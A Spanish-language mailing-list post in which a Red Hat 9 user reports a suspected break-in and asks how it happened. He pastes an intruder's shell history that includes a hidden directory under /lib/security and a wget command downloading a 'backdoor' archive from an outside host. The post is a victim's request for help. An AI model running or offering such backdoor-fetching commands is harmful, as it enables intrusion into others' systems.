Fui atacado]
Hola lista, un saludo para todos. Sé que esto es una lista de debian pero
quisiera también ayuda de uds. Les cuento.
Creo que fui victima de un ataque y quisiera saber como
lo hiceron para proteger mi maquina aun màs, además el ataque fue como
de advertencia porque ya me habria destruido todo. Y creo que me
capturaron un password y montaron un shell paralelo, esa es mi
apreciacion y uds me diran si es asi.
Estaba trabajando en mi maquina(con redhat9) y de repente vi algo raro en
los archivo que estan en /etc. entonce me fui a /var/log/messages y no
encontre nada raro, excepto que me parecio raro que no tenia registrado
nada de fecha 18 de febrero en el syslog. Luego hice un history y me
aparecio esto que por su puesto yo no lo hice(màs raro aun):
484 cat /etc/issue
485 ps
486 bash
487 /usr/sbin:/sbin:/usr/bin:/bin:/lib/security/.config/bin
488 netstat -a
489 cd /lib/security/.config/bin
490 cd /lib/security/.config
491 dir
492 cd ssh
493 dir
494 cd ..
495 wget http://www.gwydiondylan.org/downloads/binaries/linux/x86 496
/tar/gwydion-dylan-2.3.10-x86-linux.tar.gz
497 wget
http://www.gwydiondylan.org/downloads/binaries/linux/x86/tar/gwydion-dylan-2.3.10-x86-linux.tar.gz
498 wget geocities.com/s3rjiu/backdoor/ser.tar.gz
Esto paquete porsuesto no los baje.
Ah hago un ps y no sale nada, me dice esto:
Violación de segmento
Cual es la inseguridad que tengo?
Gracias y saludos......
--
Federico Contreras
T.S.U. en Informática
U.D.O.
Reply to: